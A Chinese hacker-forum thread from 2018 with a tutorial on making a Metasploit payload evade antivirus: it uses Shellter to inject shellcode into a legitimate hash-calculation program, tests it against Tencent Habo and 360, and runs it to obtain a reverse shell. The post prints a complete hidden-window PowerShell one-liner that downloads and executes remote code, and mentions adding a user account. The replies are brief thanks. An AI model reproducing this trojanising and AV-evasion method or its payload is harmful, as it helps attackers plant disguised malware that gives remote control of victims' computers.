设为首页收藏本站
查看: 1044|回复: 9

Metasploit免杀,过墙

[复制链接]
  • TA的每日心情
    擦汗
    1 小时前
  • 签到天数: 374 天

    [LV.9]以坛为家II

    发表于 2018-11-8 19:02:18 | 显示全部楼层 |阅读模式
    Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。-百度百科

    上面可以完成很多骚操作,但是由于太有名,一般的编码方式怎么编还是过不去防火墙。

    今天来谈谈一种特别的免杀方法,代码注入

    工具
    kali
    window7
    Metasploit
    Shellter
    腾讯哈勃文件分析

    Shellter是一个动态的shellcode注入工具。动态意味着Shellter能感染我想要感染的文件,并且它还为我提供了不同的选感染文件的方式。

    操作详情



    我用的是一个哈希值计算软件作为示范



    最后这个是我们需要用的恶意代码
    powershell.exe -nop -w hidden -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]:efaultCredentials;IEX $K.downloadstring('http://192.168.23.128:8080/yB2QVdxlQJbs9T');

    现在使用shellter注入恶意代码





    现在输入我们刚刚生成的恶意代码



    然后成功注入



    现在可以关闭软件了。

    现在把文件上传到腾讯哈勃分析

    结果如下



    360查杀结果如下



    运行程序



    反弹了一个会话,现在打开shell



    成功打开了shell

    ps:打开软件时360会有提示,我还不知道怎么去除。。。

    好像只要是有特殊命令执行360都会有提示,就算是你自己输入的,比如自己添加用户 net user 用户名 密码 /add

    不过也算是免杀了一半



  • TA的每日心情
    郁闷
    前天 08:53
  • 签到天数: 118 天

    [LV.6]常住居民II

    发表于 2018-11-8 19:25:28 | 显示全部楼层
    竟然是沙发?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    7 天前
  • 签到天数: 107 天

    [LV.6]常住居民II

    发表于 2018-11-8 20:21:27 | 显示全部楼层
    学习到了,感谢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-4-2 23:18
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2018-11-8 22:18:20 | 显示全部楼层
    谢谢楼主分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2019-4-9 17:19
  • 签到天数: 148 天

    [LV.7]常住居民III

    发表于 2018-11-9 11:27:31 | 显示全部楼层
    看不懂,没学过
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    12 小时前
  • 签到天数: 224 天

    [LV.7]常住居民III

    发表于 2018-11-9 11:28:19 | 显示全部楼层
    感谢楼主分享...
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2018-11-20 18:32
  • 签到天数: 9 天

    [LV.3]偶尔看看II

    发表于 2018-11-10 08:44:30 | 显示全部楼层
    楼主真厉害,还有就是打开无签名未知程序360提示是很正常的,除非你干掉360,
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-3-14 09:58
  • 签到天数: 82 天

    [LV.6]常住居民II

    发表于 2018-12-5 10:51:48 | 显示全部楼层
    果断收藏,虽然现在还看不懂
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-3-23 20:11
  • 签到天数: 50 天

    [LV.5]常住居民I

    发表于 2018-12-29 21:40:52 | 显示全部楼层
    第一回建这么高大上的好好看
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-2-27 19:13
  • 签到天数: 37 天

    [LV.5]常住居民I

    发表于 2019-1-1 13:48:13 | 显示全部楼层
    感谢楼主分享
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    关闭

    站长推荐 上一条 /1 下一条

    红盟社区--中国红客联盟 

    Processed in 0.100359 second(s), 22 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    Powered by HUC © 2001-2017 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表